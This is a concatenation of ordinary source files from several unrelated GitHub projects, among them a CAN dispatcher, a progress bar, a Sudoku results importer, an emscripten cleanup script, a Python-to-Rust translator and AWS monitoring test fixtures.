#### File: can/host/message_dispatcher.py
```python
class MessageDispatcher:
def __init__(self, filterList = None):
"""Constructor"""
self.filter = []
if filterList:
for filter in filterList:
self.addFilter(filter)
def addFilter(self, filter):
"""Add a filter
The filter-object must feature a check(message) method which returns
True or False whether the callback should be called or not and a
getCallback() method to retrieve this callback function.
"""
self.filter.append(filter)
def removeFilter(self, filter):
"""Remove this Filter"""
self.filter.remove(filter)
def send(self, message):
pass
def _processMessage(self, message):
"""Check all filter for this message and call the callback
functions for those how matches.
"""
for filter in self.filter:
if filter.check(message):
self._executeCallback(filter.getCallback(), message)
def _executeCallback(self, callback, message):
"""Call a callback function."""
callback(message)
```
#### File: host/util/progressbar.py
```python
import sys
class ProgressBar:
""" Erstellt eine text-basierte Statusanzeige.
Um den Fortschrittsbalken anzuzeigen ruft man das Objekt als Funktion auf.
Das koennte zum Beispiel so aussehen:
>>> foo = ProgressBar(width=40)
>>> foo(22)
[=======> 22% ]
Beim erstellen kann man ausserdem den Maximal/Minimalwert und die Breite
angeben. Die Breite entspricht der kompletten Anzeige inklusive der
oeffnenden bzw. schliessenden Klammern
"""
def __init__(self, min = 0, max = 100, width = 80):
self.progbar = ""
self.min = min
self.max = max
self.width = width
self.value = 0
self.update(0)
def update(self, value = 0):
""" Aktualisiert den Fortschrittsbalken.
Wenn value ausserhalb der Maximalen Grenzen liegt wird es auf den
den Minimal bzw. Maximalwert begrenzt.
"""
if value < self.min: value = self.min
if value > self.max: value = self.max
if value == self.value:
return False
self.value = value
# Ausrechnen wieviel Prozent erledigt sind
percent_done = (float(value - self.min) /
float(self.max - self.min)) * 100.0
percent_done = int(round(percent_done))
max_char = self.width - 2
num_hashes = int(round((percent_done / 100.0) * max_char))
if num_hashes == 0:
self.progbar = "[>%s]" % (' '*(max_char-1))
elif num_hashes == max_char:
self.progbar = "[%s]" % ('='*max_char)
else:
self.progbar = "[%s>%s]" % ('='*(num_hashes-1),
' '*(max_char-num_hashes))
# Prozentanzeige ungefaehr mittig einsetzen.
percent_position = (len(self.progbar) / 2) - len(str(percent_done))
percent_str = str(percent_done) + "%"
self.progbar = ''.join([self.progbar[0:percent_position], percent_str,
self.progbar[percent_position+len(percent_str):]])
return True
def __str__(self):
""" Gibt den aktuellen Fortschrittsbalken aus.
Die Laenge des zurueckgegebenen Strings entspricht dem Wert von "width" der
beim erzeugen des Objekts mitgegeben wurde (Standardwert ist 80).
"""
return str(self.progbar)
def __call__(self, value):
""" Aktualisiert die Statusanzeige und gibt sie auf den stdout-Stream
aus falls sie sich geaendert hat.
Schreibt als erstes ein "carrige return" sodass die aktuelle Zeile
ueberschrieben wird.
"""
if self.update(value):
progbar = str(self)
sys.stdout.write("\r" + progbar)
sys.stdout.flush()
# Kleines Testprogramm fuer die ProgressBar-Klasse
#
# Gibt auf der Konsole einen 60 Zeichen breiten Fortschrittsbalken aus
# der langsam von 0 auf 100 % laeuft.
if __name__ == '__main__':
import time
bar = ProgressBar(width=60)
for x in range(0,101):
time.sleep(0.10)
bar(x)
print ""
```
#### File: system_design/xmlparser/utils.py
```python
import re
import copy
from parser_exception import ParserException
def check_name(name):
""" Checks if a string comply with some rules for the notation
of a name.
"""
if not re.match("^([A-Z]?[a-z0-9]* )*([A-Z]?[a-z0-9]*)$", name):
raise ParserException("Error in name '%s'. Check Spelling or Case. Allowed are only Names matching '^([A-Z]?[a-z0-9]* )*([A-Z]?[a-z0-9]*)$' " % name)
class SortedDictionary(dict):
"""
A dictionary with an Iterator which sorts the output
"""
def __iter__(self):
class Iterator:
def __init__(self, list):
self.list = list
self.list.sort()
def __iter__(self):
return self
def next(self):
try:
item = self.list.pop(0)
return item
except IndexError:
raise StopIteration()
return Iterator(self.values())
def iter(self):
return self.__iter__()
class SingleAssignDictionary(SortedDictionary):
""" A dictionary which don't allow overwriting attributes after
the initial creation.
"""
def __init__(self, name):
self.name = name
SortedDictionary.__init__(self)
def __setitem__(self, key, item):
if not self.has_key(key):
SortedDictionary.__setitem__(self, key, item)
else:
raise ParserException("%s '%s' defined twice!" % (self.name.capitalize(), key))
def remove(self, key):
SortedDictionary.pop(self, key)
def replace(self, key, item):
SortedDictionary.__setitem__(self, key, item)
def update(self, other):
for element in other:
try:
# try to update an already existing element
# from this component with the values from the
# toplevel component
SortedDictionary.__getitem__(self, element.name).update(element)
except KeyError:
# no element found, inherit the full top element
SortedDictionary.__setitem__(self, element.name, element)
def copy(self):
""" Create a shallow copy """
return copy.copy(self)
``` |
{
"source": "jrahm/DuckTest",
"score": 2
} |
#### File: presentation/code/body.py
```python
def test_walk(duck):
duck.walk()
def ruffle(duck):
duck.feathers()
def test_feathers(duck):
duck.quack()
ruffle(duck)
duck = Duck()
person = Person()
test_walk(duck)
test_walk(person)
test_feathers(duck)
test_feathers(person)
```
#### File: presentation/code/duck.py
```python
class Duck:
def __init__(self):
print("Duck!")
def walk(self):
print("Waddle")
def quack(self):
print("Quack!")
def feathers(self):
print("Ruffle")
```
#### File: presentation/code/person.py
```python
class Person:
def __init__(self):
print("Person!")
def walk(self):
print("Walk")
def quack(self):
print("\"Quock!\"")
```
#### File: DuckTest/tests/linkedlist.py
```python
class LinkedList:
def __init__(self):
self.next = None
def add(self):
self.next = LinkedList()
print (LinkedList().next.next.data)
```
#### File: DuckTest/tests/test_return.py
```python
import sys
def my_function(x):
return 2
def my_str_fn():
return "immastring"
def my_function2(x):
if x:
return set()
else:
return "x"
def my_void_function(y):
print (y)
def my_dead_code_function(z):
print (z)
if z:
return
print (z)
def is_eq(x, y):
return x == y
x = my_function2()
is_eq(x, "test")
sys.argv.append(x)
``` |
{
"source": "jrahm/Sudoku",
"score": 3
} |
#### File: Sudoku/runs/database.py
```python
import sqlite3
import glob
class Run:
def __init__(self):
self.n = 0
self.hints = 0
self.solution_grid = None
self.input_grid = None
self.output_grid = None
self.time_millis = 0
def __str__(self):
return "{n = %d, hints = %d, solution = %s, input = %s, output = %s, time = %d}" % \
(self.n, self.hints, self.solution_grid, self.input_grid, self.output_grid, self.time_millis)
def insert(self, cursor):
cursor.execute("insert into runs (n, hints, solution_grid, input_grid, output_grid, time_millis) values (%d, %d, %s, %s, %s, %d)" %\
(self.n, self.hints, self.solution_grid, self.input_grid, self.output_grid, self.time_millis))
def split_list(lst):
ret = []
current = []
for l in lst:
if l == '':
if current != []:
ret.append(current)
current = []
else:
current.append(l)
ret.append(current)
return ret
def load_run(fname):
try:
_, n, nhints, number = fname.split('-')
number, _ = number.split('.')
fd = open(fname)
ret_run = Run()
lines = [x.strip() for x in fd.readlines()]
lines = split_list(lines)
ret_run.n = int(n)
ret_run.hints = int(nhints)
if lines[0][0] == 'Timeout':
ret_run.solution_grid = 'NULL'
ret_run.input_grid = 'NULL'
ret_run.output_grid = 'NULL'
ret_run.time_millis = 600000
else:
ret_run.solution_grid = "'" + ''.join(lines[0]) + "'"
ret_run.input_grid = "'" + ''.join(lines[1]) + "'"
ret_run.output_grid = "'" + ''.join(lines[2]) + "'"
ret_run.time_millis = int(lines[3][0][6:])
return ret_run
except IOError as e:
print(e)
return None
connection = sqlite3.connect('database.db')
cursor = connection.cursor()
filenames = glob.glob('run*')
for fname in filenames:
run = load_run(fname)
print (run)
run.insert(cursor)
connection.commit()
connection.close()
``` |
{
"source": "JRahnama/runtime",
"score": 3
} |
#### File: mono/wasm/sanitize.py
```python
import sys, json, os, shutil
def glob(path):
return [os.path.join(path, filename) for filename in os.listdir(path)]
def remove(*paths):
for path in paths:
path = os.path.abspath(path)
try:
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
except OSError as error:
print(error)
def rewrite_package_json(path):
package = open(path,"rb+")
settings = json.load(package)
settings["devDependencies"] = {}
package.seek(0)
package.truncate()
json.dump(settings, package, indent=4)
package.close()
emsdk_path = sys.argv[1]
emscripten_path = os.path.join(emsdk_path, "upstream", "emscripten")
node_root = os.path.join(emsdk_path, "node")
node_paths = glob(node_root)
upgrade = False
npm = os.path.join(node_paths[0], "bin", "npm")
if not os.path.exists(npm):
npm = "npm"
def update_npm(path):
try:
os.chdir(os.path.join(path, "lib"))
os.system(npm + " install npm@latest")
prune()
except OSError as error:
print("npm update failed")
print(error)
def remove_npm(path):
os.chdir(path)
remove("bin/npx", "bin/npm", "include", "lib", "share")
def prune():
try:
os.system(npm + " prune --production")
except OSError as error:
print("npm prune failed")
print(error)
os.chdir(emscripten_path)
rewrite_package_json("package.json")
prune()
remove("tests",
"node_modules/google-closure-compiler",
"node_modules/google-closure-compiler-java",
"node_modules/google-closure-compiler-osx",
"node_modules/google-closure-compiler-windows",
"node_modules/google-closure-compiler-linux",
"third_party/closure-compiler",
"third_party/jni",
"third_party/ply",
"third_party/uglify-js",
"third_party/websockify")
for path in node_paths:
if upgrade:
update_npm(path)
else:
remove_npm(path)
``` |
{
"source": "JRaidal/Bayesian2D",
"score": 3
} |
#### File: Bayesian2D/tools/acquisition.py
```python
def acquisition(XY, x_bounds, y_bounds, e, model, max_min, n_random):
'''
Creates sample points and finds the one most likely to improve the function when
evaluating.
Parameters
----------
XY : numpy array
Array of all points evaluated so far.
x_bounds : list
Two element list of x-axis boundaries for the function.
y_bounds : list
Two element list of y-axis boundaries for the function.
e : float
Exploration parameter.
The default is 0.2.
model : sklearn.gaussian_process
Some Gaussian process model.
max_min : str
Specifies whether the algorithm is searching for maxima or minima.
n_random : int
Number of random points to be created.
The default is 50000.
Returns
-------
X_best : float
x-coordinate of point with maximum probability of improvement.
Y_best : float
y-coordinate of point with maximum probability of improvement.
'''
# Find the best surrogate mean found so far
z_surrogate, _ = surrogate(model, XY)
if max_min == 'maximum':
best = numpy.max(z_surrogate)
if max_min == 'minimum':
best = numpy.min(z_surrogate)
#Extract random points
XYsamples = create_random(x_bounds, y_bounds, n_random)
# Find the mean and standard deviation of the sample points
mu, std = surrogate(model, XYsamples)
# Calculate the maximum probability of improvement
r=(mu-best)
c=(r)/(std+1e-9)
with catch_warnings():
# Ignore scaling warnings (not true)
simplefilter("ignore")
c= preprocessing.scale(c)
scores=norm.cdf(c - e)
# Find point with best score
if max_min == 'maximum':
index_max = (numpy.argwhere(scores == numpy.max(scores)))
if max_min == 'minimum':
index_max = (numpy.argwhere(scores == numpy.min(scores)))
ix_max = index_max[0,0]
X_max, Y_max = XYsamples[ix_max]
X_best = float(X_max)
Y_best = float(Y_max)
return X_best, Y_best
```
#### File: Bayesian2D/tools/surrogate.py
```python
def surrogate(model, XY):
'''
Predicts the mean and standard deviation of points using Gaussian processes
Parameters
----------
model : sklearn.gaussian_process
Some Gaussian process model.
XY : numpy array
Array of x and y coordinates.
Returns
-------
array, array
Returns mean and standard deviation arrays for evaluated points.
'''
return model.predict(XY, return_std=True)
``` |
{
"source": "JRainbowOS/pypyrust",
"score": 3
} |
#### File: JRainbowOS/pypyrust/rust_generator.py
```python
import ast
import sys
from enum import Enum
import filecmp
import os
from var_analyser import VariableAnalyser, type_from_annotation
OPEN_BRACE = '{'
CLOSE_BRACE = '}'
# ALLOWED_BINARY_OPERATORS = { "Add", "Mult", "Sub", "Div", "FloorDiv",
# "Mod", "LShift", "RShift", "BitOr", "BitXor", "BitAnd" }
ALLOWED_COMPARISON_OPERATORS = { "Eq", "NotEq", "Lt", "LtE", "Gt", "GtE" }
REPLACE_CONSTANTS = {
True : "true",
False : "false",
}
# Fortunately, the precedence of Python operators is the same as Rust,
# except for ** (doesn't exist in Rust), is/in (don't exist in Rust)
# "not", which is very highest precedence in Rust, but just above the
# other boolean operators in Rust.
OPERATOR_PRECEDENCE = {
"Pow": 12,
"UAdd": 11, "USub": 11, "Invert": 11, "Not": 11,
"Mult": 10, "Div": 10, "FloorDiv": 10, "Mod": 10,
"Add": 9, "Sub": 9,
"LShift": 8, "RShift": 8,
"BitAnd": 7,
"BitXor": 6,
"BitOr": 5,
"Eq": 4, "NotEq": 4, "Gt": 4, "GtE": 4, "Lt": 4, "LtE": 4,
# "Not": 3, (this would be right for Python, but not for Rust)
"And": 2,
"Or": 1,
}
# One bigger than any actual precedence. Use this to force parentheses
MAX_PRECEDENCE = 13
class RustGenerator(ast.NodeVisitor):
"""
Visitor of the Python AST which generates Rust code, streaming
it out to stdout.
"""
def __init__(self):
self.indent = 0
self.next_separator = ""
self.precedence = 0
self.in_aug_assign = False
self.variables = set()
self.mutable_vars = set()
def pretty(self):
return ' ' * self.indent
def add_pretty(self, increment: int):
self.indent += increment
def print_operator(self, op: str):
if self.in_aug_assign:
print(f" {op}= ", end='')
else:
print(f" {op} ", end='')
def parens_if_needed(self, op: str, visit):
# use precedence * 2 so we can add one to control less than or equal
prec = OPERATOR_PRECEDENCE[op] * 2
if prec < self.precedence:
print("(", end='')
old_prec = self.precedence
self.precedence = prec
visit()
self.precedence = old_prec
if prec < self.precedence:
print(")", end='')
def visit_FunctionDef(self, node):
# Analyse the variables in this function to see which need
# to be predeclared or marked as mutable
analyser = VariableAnalyser()
analyser.visit(node)
# function name
print(f"{self.pretty()}fn {node.name}(", end='')
# start with a clean set of variables
# (do we need to worry about nested functions?)
self.variables.clear()
self.mutable_vars = analyser.get_mutable_vars()
# function arg list
self.next_separator = ""
self.generic_visit(node.args)
# return value
if node.returns is not None:
typed = type_from_annotation(node.returns, "return")
print(f") -> {typed} {OPEN_BRACE}")
else:
print(") {")
self.add_pretty(1)
# start with any variable declarations
for (var, typed, default) in analyser.get_predeclared_vars():
self.variables.add(var)
print(f"{self.pretty()}let mut {var}: {typed} = {default};")
# body of the function
for expr in node.body:
self.visit(expr)
self.add_pretty(-1)
print(f"{self.pretty()}{CLOSE_BRACE}")
print()
# clean the set of variables. The names do not leak past here
self.variables.clear()
def visit_arg(self, node):
typed = type_from_annotation(node.annotation, node.arg)
mutable = "mut " if node.arg in self.mutable_vars else ""
print(f"{self.next_separator}{mutable}{node.arg}: {typed}", end='')
self.variables.add(node.arg)
self.next_separator = ", "
def visit_Expr(self, node):
print(f"{self.pretty()}", end='')
self.generic_visit(node)
print(";")
def visit_Return(self, node):
print(f"{self.pretty()}return ", end='')
self.generic_visit(node)
print(";")
def visit_Call(self, node):
if node.func.id == "print":
self.visit_Print(node)
else:
self.visit(node.func)
print("(", end='')
sep = ""
for a in node.args:
print(sep, end='')
self.visit(a)
sep = ", "
print(")", end='')
def visit_Print(self, node):
"""
Not part of the standard visitor pattern, but internally
special-cased, because Rust print is quite different from
Python.
"""
# detect end= override
endline = None
sep = None
for k in node.keywords:
if k.arg == "end":
endline = k.value
elif k.arg == "sep":
sep = k.value
n = len(node.args)
if n == 0:
if not endline:
print("println!();")
else:
for i, arg in enumerate(node.args):
if i != 0:
print("print!(", end='')
if sep:
self.visit(sep)
else:
print('" "', end='')
print(");")
if i == n - 1 and not endline:
print("println!(", end='')
else:
print("print!(", end='')
self.visit(arg)
print(");")
# for now, we assume that the override sets end to ''
def visit_Name(self, node):
print(f"{node.id}", end='')
def visit_NameConstant(self, node):
val = node.value
if val in REPLACE_CONSTANTS:
val = REPLACE_CONSTANTS[node.value]
print(f"{val}", end='')
def visit_Str(self, node):
print(f'"{node.s}"', end='')
def visit_Num(self, node):
print(f"{node.n}", end='')
def visit_BinOp(self, node):
# some binary operators such as '+' translate
# into binary operators in Rust. However, pow needs
# special handling.
op = node.op.__class__.__name__
if op == "Pow":
self.visit_PowOp(node)
else:
self.parens_if_needed(op, lambda: self.do_visit_BinOp(node))
def do_visit_BinOp(self, node):
self.visit(node.left)
self.visit(node.op)
self.precedence += 1 # left to right associative
self.visit(node.right)
self.precedence -= 1
def visit_PowOp(self, node):
"""
Not a standard visitor function, but one we invoke
to handle the Pow operator "**"
"""
# ensure that any contained expression gets wrapped in
# parentheses
old_prec = self.precedence
self.precedence = MAX_PRECEDENCE * 2
# TODO decide between pow, powf and powi on the basis of type
# For now, assume the arguments are integer (i64). Note that
# Rust requires the rhs to be unsigned.
self.visit(node.left)
print(".pow((", end='')
self.precedence = 0 # already have parentheses
self.visit(node.right)
print(") as u32)", end='')
self.precedence = old_prec
def visit_Add(self, node):
self.print_operator("+")
def visit_Mult(self, node):
self.print_operator("*")
def visit_Sub(self, node):
self.print_operator("-")
def visit_Div(self, node):
# print("warning: floating point division", file=sys.stderr)
self.print_operator("/")
def visit_FloorDiv(self, node):
# print("warning: integer division", file=sys.stderr)
self.print_operator("/")
def visit_Mod(self, node):
# print("warning: Python mod operator is different from Rust")
self.print_operator("%")
# def visit_Pow(self, node):
# print("pow", end='')
def visit_LShift(self, node):
self.print_operator("<<")
def visit_RShift(self, node):
self.print_operator(">>")
def visit_BitOr(self, node):
self.print_operator("|")
def visit_BitXor(self, node):
self.print_operator("^")
def visit_BitAnd(self, node):
self.print_operator("&")
def visit_UnaryOp(self, node):
op = node.op.__class__.__name__
self.parens_if_needed(op, lambda: self.generic_visit(node))
def visit_UAdd(self, node):
"""
There is no unary addition operator in Rust. Just omit it
as it is a no-op
"""
pass
def visit_USub(self, node):
print("-", end='')
def visit_Not(self, node):
print("!", end='')
def visit_Invert(self, node):
"""
In Python the bitwise inversion operator "~" is distinct
from boolean negation. This is not the case in Rust.
"""
print("!", end='')
def visit_BoolOp(self, node):
op = node.op.__class__.__name__
self.parens_if_needed(op, lambda: self.do_visit_BoolOp(node))
def do_visit_BoolOp(self, node):
"""
Invoked by visit_BoolOp to do the work apart from the parens
"""
first = True
for v in node.values:
if not first:
self.visit(node.op)
self.visit(v)
first = False
def visit_And(self, node):
print(" && ", end='')
def visit_Or(self, node):
print(" || ", end='')
def visit_Compare(self, node):
"""
Invoked for any comparison operator such as <, >, ==.
Note that multiple comparisons in Rust are very different from
Python. In Rust, it is not permissible to write "a X b Y c"
where X and Y are comparison operators (possibly the same one).
In Python, this is shorthand for "(a X b) and (b Y c). We
therefore expand it like this in the Rust.
"""
op_len = len(node.ops)
assert(op_len == len(node.comparators))
if op_len > 1:
print("(", end='')
self.visit(node.left)
for op, c, i in zip(node.ops, node.comparators, range(op_len)):
# we do not yet handle is or in
assert(op.__class__.__name__ in ALLOWED_COMPARISON_OPERATORS)
self.visit(op)
self.visit(c)
if op_len > 1:
if i != op_len - 1:
print(") && (", end='')
self.visit(c)
else:
print(")", end='')
def visit_Eq(self, node):
print(" == ", end='')
def visit_NotEq(self, node):
print(" != ", end='')
def visit_Lt(self, node):
print(" < ", end='')
def visit_LtE(self, node):
print(" <= ", end='')
def visit_Gt(self, node):
print(" > ", end='')
def visit_GtE(self, node):
print(" >= ", end='')
def visit_IfExp(self, node):
print("if ", end='')
self.visit(node.test)
print(" { ", end='')
self.visit(node.body)
print(" } else { ", end='')
self.visit(node.orelse)
print(" }", end='')
def visit_If(self, node):
print(f"{self.pretty()}if ", end='')
self.visit(node.test)
print(" {")
self.add_pretty(1)
for line in node.body:
self.visit(line)
self.add_pretty(-1)
if node.orelse:
print(f"{self.pretty()}{CLOSE_BRACE} else {OPEN_BRACE}")
self.add_pretty(1)
for line in node.orelse:
self.visit(line)
self.add_pretty(-1)
print(f"{self.pretty()}{CLOSE_BRACE}")
def visit_While(self, node):
print(f"{self.pretty()}while ", end='')
self.visit(node.test)
print(" {")
self.add_pretty(1)
for line in node.body:
self.visit(line)
self.add_pretty(-1)
assert(len(node.orelse) == 0)
print(f"{self.pretty()}{CLOSE_BRACE}")
def visit_For(self, node):
print(f"{self.pretty()}for ", end='')
self.visit(node.target)
print(" in ", end='')
self.visit(node.iter)
print(" {")
self.add_pretty(1)
for line in node.body:
self.visit(line)
self.add_pretty(-1)
assert(len(node.orelse) == 0)
print(f"{self.pretty()}{CLOSE_BRACE}")
def visit_Break(self, node):
print(f"{self.pretty()}break;")
def visit_Continue(self, node):
print(f"{self.pretty()}continue;")
def visit_Assign(self, node):
"""
Variable assignment statement, such as x = y = 42
Note that Rust does not handle multiple assignments on one
line, so we write a line for each one.
"""
first = True
for target in node.targets:
# treatment depends on whether it is the first time we
# have seen this variable. (Do not use shadowing.)
name = target.id
if name in self.variables:
print(f"{self.pretty()}", end='')
else:
mutable = "mut " if name in self.mutable_vars else ""
print(f"{self.pretty()}let {mutable}", end='')
self.variables.add(name)
self.visit(target)
print(" = ", end='')
if first:
self.visit(node.value)
first_name = name
first = False
else:
# only evaluate expression once
print(f" = {first_name}", end='')
print(";")
def visit_AnnAssign(self, node):
"""
Hinted variable assignment statement, such as x: int = 42
We do not yet handle non-simple assignments such as
(x): int = 42
"""
# treatment depends on whether it is the first time we
# have seen this variable. (Do not use shadowing.)
name = node.target.id
if name in self.variables:
print(f"{self.pretty()}", end='')
else:
mutable = "mut " if name in self.mutable_vars else ""
print(f"{self.pretty()}let {mutable}", end='')
self.variables.add(name)
self.visit(node.target)
typed = type_from_annotation(node.annotation, node.target)
print(f": {typed} = ", end='')
self.visit(node.value)
print(";")
def visit_AugAssign(self, node):
print(self.pretty(), end='')
self.visit(node.target)
self.in_aug_assign = True
self.visit(node.op)
self.in_aug_assign = False
self.visit(node.value)
print(";")
def test_compiler(filename: str):
input_filename = f"tests/{filename}.py"
output_filename = f"temp/{filename}.ru"
baseline_filename = f"baseline/{filename}.ru"
input_file = open(input_filename, 'r')
source = input_file.read()
input_file.close()
output_file = open(output_filename, 'w')
old_stdout = sys.stdout
sys.stdout = output_file
tree = ast.parse(source, filename, 'exec')
RustGenerator().visit(tree)
output_file.close()
sys.stdout = old_stdout
ok = filecmp.cmp(baseline_filename, output_filename, shallow=False)
if ok:
print(f"test {filename} succeeded")
os.remove(output_filename)
else:
print(f"test {filename} failed. Output file {output_filename} left in place.")
if __name__ == "__main__":
test_compiler("hello_world")
test_compiler("add_mult")
test_compiler("flow_of_control")
test_compiler("variables")
``` |
{
"source": "jraisher/pyfmpcloud",
"score": 2
} |
#### File: pyfmpcloud/pyfmpcloud/settings.py
```python
import configparser
import os
cfile = os.path.join(os.path.dirname(__file__), 'config.ini')
cfg = configparser.ConfigParser()
cfg.read(cfile)
try:
cfg.has_section('API')
except:
raise Exception('Config File was not read.')
def get_urlroot():
urlroot = cfg['API']['url_root']
return urlroot
def get_urlrootfmp():
urlrootfmp = cfg['API']['url_root_fmp']
return urlrootfmp
def get_apikey():
apikey = cfg['API']['api_key']
return apikey
def set_apikey(apikey):
cfg['API']['api_key'] = apikey
with open(cfile, 'w') as configfile:
cfg.write(configfile)
``` |
{
"source": "jrake-revelant/zmon-aws-agent",
"score": 2
} |
#### File: zmon-aws-agent/tests/conftest.py
```python
import json
import base64
from datetime import datetime
from dateutil.tz import tzutc
import pytest
from botocore.exceptions import ClientError
from zmon_aws_agent.aws import get_hash
ACCOUNT = '<KEY>'
REGION = 'eu-central-1'
class ThrottleError(ClientError):
def __init__(self, throttling=True):
self.throttling = throttling
self.response = {'Error': {'Code': 'Throttling' if throttling else 'BadRequest'}}
def get_elc_cluster():
cluster = {
'CacheClusterStatus': 'available',
'CacheClusterId': 'elc-1',
'Engine': 'redis',
'EngineVersion': '1.0.5',
'NumCacheNodes': 2,
'CacheNodeType': 'redis',
'ReplicationGroupId': 'elc-1-replica',
'CacheNodes': [
{
'CacheNodeStatus': 'available', 'CacheNodeId': 'elc-n-1',
'Endpoint': {'Port': 2727, 'Address': '0.0.0.0'}
},
{'CacheNodeStatus': 'unknown'}
]
}
resp = {
'CacheClusters': [cluster.copy() for i in range(4)]
}
statuses = ('available', 'modifying', 'snapshotting', 'unknown')
for idx, c in enumerate(resp['CacheClusters']):
c['CacheClusterStatus'] = statuses[idx]
node = {
'id': 'elc-elc-1-elc-n-1[{}:{}]'.format(ACCOUNT, REGION),
'region': REGION,
'created_by': 'agent',
'infrastructure_account': ACCOUNT,
'type': 'elc',
'cluster_id': 'elc-1',
'node_id': 'elc-n-1',
'engine': 'redis',
'version': '1.0.5',
'cluster_num_nodes': 2,
'host': '0.0.0.0',
'port': 2727,
'instance_type': 'redis',
'replication_group': 'elc-1-replica',
}
return resp, [node] * 3
def get_autoscaling():
asg = {
'AutoScalingGroupName': 'asg-1',
'AvailabilityZones': ['zone-1', 'zone-2'],
'DesiredCapacity': '3',
'MaxSize': 10,
'MinSize': 3,
'Instances': [
{'InstanceId': 'ins-1', 'LifecycleState': 'InService'},
{'InstanceId': 'ins-2', 'LifecycleState': 'InService'},
{'InstanceId': 'ins-3', 'LifecycleState': 'InService'},
{'InstanceId': 'ins-4', 'LifecycleState': 'unknown'},
],
'CreatedTime': datetime(2018, 6, 6, 9, 59, 38, 127000, tzinfo=tzutc())
}
reservations = {
'Reservations': [
{
'Instances': [
{'PrivateIpAddress': '192.168.20.16', 'InstanceId': 'ins-1'},
{'InstanceId': 'ins-2'}
]
}
]
}
instance_ids = ['ins-1', 'ins-2', 'ins-3']
resp = {
'AutoScalingGroups': [asg]
}
result = [
{
'id': 'asg-asg-1[{}:{}]'.format(ACCOUNT, REGION),
'type': 'asg',
'infrastructure_account': ACCOUNT,
'region': REGION,
'created_by': 'agent',
'name': 'asg-1',
'availability_zones': ['zone-1', 'zone-2'],
'desired_capacity': '3',
'max_size': 10,
'min_size': 3,
'instances': [{'aws_id': 'ins-1', 'ip': '192.168.20.16'}],
'created_time': '2018-06-06 09:59:38.127000'
}
]
return resp, reservations, instance_ids, result
def get_elbs():
resp = {
'LoadBalancerDescriptions': [
{
'LoadBalancerName': 'elb-1',
'DNSName': 'elb-1.example.org',
'Scheme': 'https',
'Instances': ['ins-1', 'ins-2', 'ins-3'],
'ListenerDescriptions': [{'Listener': {'Protocol': 'HTTPS'}}],
},
]
}
tags = {'TagDescriptions': [{'LoadBalancerName': 'elb-1'}]}
health = {
'InstanceStates': [
{'State': 'InService'},
{'State': 'InService'},
{'State': 'OutOfService'},
]
}
result = [
{
'id': 'elb-elb-1[{}:{}]'.format(ACCOUNT, REGION),
'type': 'elb',
'infrastructure_account': ACCOUNT,
'region': REGION,
'created_by': 'agent',
'elb_type': 'classic',
'dns_name': 'elb-1.example.org',
'host': 'elb-1.example.org',
'name': 'elb-1',
'scheme': 'https',
'url': 'https://elb-1.example.org',
'members': 3,
'active_members': 2,
}
]
return resp, tags, health, result
def get_elbs_application():
resp = {
'LoadBalancers': [
{
'LoadBalancerArn': 'arn-/app/elb-1/123456',
'LoadBalancerName': 'elb-1',
'DNSName': 'elb-1.example.org',
'Scheme': 'internal',
}
]
}
listeners = {
'Listeners': [{'Protocol': 'HTTP'}]
}
tags = {'TagDescriptions': [{'ResourceArn': 'arn-/app/elb-1/123456', 'Tags': []}]}
groups = {'TargetGroups': [{'TargetGroupArn': 'arn-group-1-elb-1'}]}
health = {
'TargetHealthDescriptions': [
{'TargetHealth': {'State': 'healthy'}},
{'TargetHealth': {'State': 'healthy'}},
{'TargetHealth': {'State': 'terminated'}},
]
}
result = [
{
'id': 'elb-elb-1[{}:{}]'.format(ACCOUNT, REGION),
'type': 'elb',
'infrastructure_account': ACCOUNT,
'region': REGION,
'created_by': 'agent',
'elb_type': 'application',
'dns_name': 'elb-1.example.org',
'host': 'elb-1.example.org',
'cloudwatch_name': 'app/elb-1/123456',
'name': 'elb-1',
'scheme': 'internal',
'url': 'http://elb-1.example.org',
'members': 3,
'active_members': 2,
'target_groups': 1,
'target_groups_arns': ['arn-group-1-elb-1'],
}
]
return resp, tags, listeners, groups, health, result
def get_apps():
resp = {
'Reservations': [
{
'OwnerId': '1234',
'Instances': [
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16', 'PublicIpAddress': '192.168.3.11',
'InstanceType': 't2.medium', 'InstanceId': 'ins-1', 'StateTransitionReason': 'state',
'InstanceLifecycle': 'spot',
'Placement': {'AvailabilityZone': 'eu-central-1a'},
'Tags': [
{'Key': 'Name', 'Value': 'stack-1'}, {'Key': 'StackVersion', 'Value': 'stack-1-1.0'},
{'Key': 'aws:cloudformation:logical-id', 'Value': 'cd-app'}
],
'ImageId': 'ami-1234',
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16',
'Placement': {'AvailabilityZone': 'eu-central-1b'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-2', 'StateTransitionReason': 'state'
},
{
'State': {'Name': 'terminated'},
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.17',
'Placement': {'AvailabilityZone': 'eu-central-1c'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-3', 'StateTransitionReason': 'state',
'Tags': [
{'Key': 'Name', 'Value': 'myname'}
]
},
],
}
]
}
status_resp = {'InstanceStatuses': [{'Events': ['ev-1', 'ev-2']}]}
user_data = [
{
'application_id': 'app-1', 'source': 'registry/stups/zmon-aws-agent:cd81',
'ports': [2222], 'runtime': 'docker',
'application_version': '1.0',
'logging': {
'fluentd_enabled': True,
'log_destination': 's3'
},
},
{
'no-appliacation-id': 'dummy'
}
]
user_resp = [{'UserData': {'Value': base64.encodebytes(bytes(json.dumps(u), 'utf-8'))}} for u in user_data]
result = [
{
'id': 'app-1-stack-1-1.0-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'public_ip': '192.168.3.11',
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1a', 'aws_id': 'ins-1',
'fluentd_enabled': 'true', 'state_reason': 'state', 'stack': 'stack-1', 'stack_version': 'stack-1-1.0',
'resource_id': 'cd-app', 'application_id': 'app-1', 'application_version': '1.0',
'source': 'registry/stups/zmon-aws-agent:cd81', 'source_base': 'registry/stups/zmon-aws-agent',
'ports': [2222], 'runtime': 'docker', 'aws:cloudformation:logical_id': 'cd-app', 'name': 'stack-1',
'events': ['ev-1', 'ev-2'], 'spot_instance': True, 'block_devices': {}, 'image': {
'id': 'ami-1234',
'name': 'Taupage-AMI-20170512-142225',
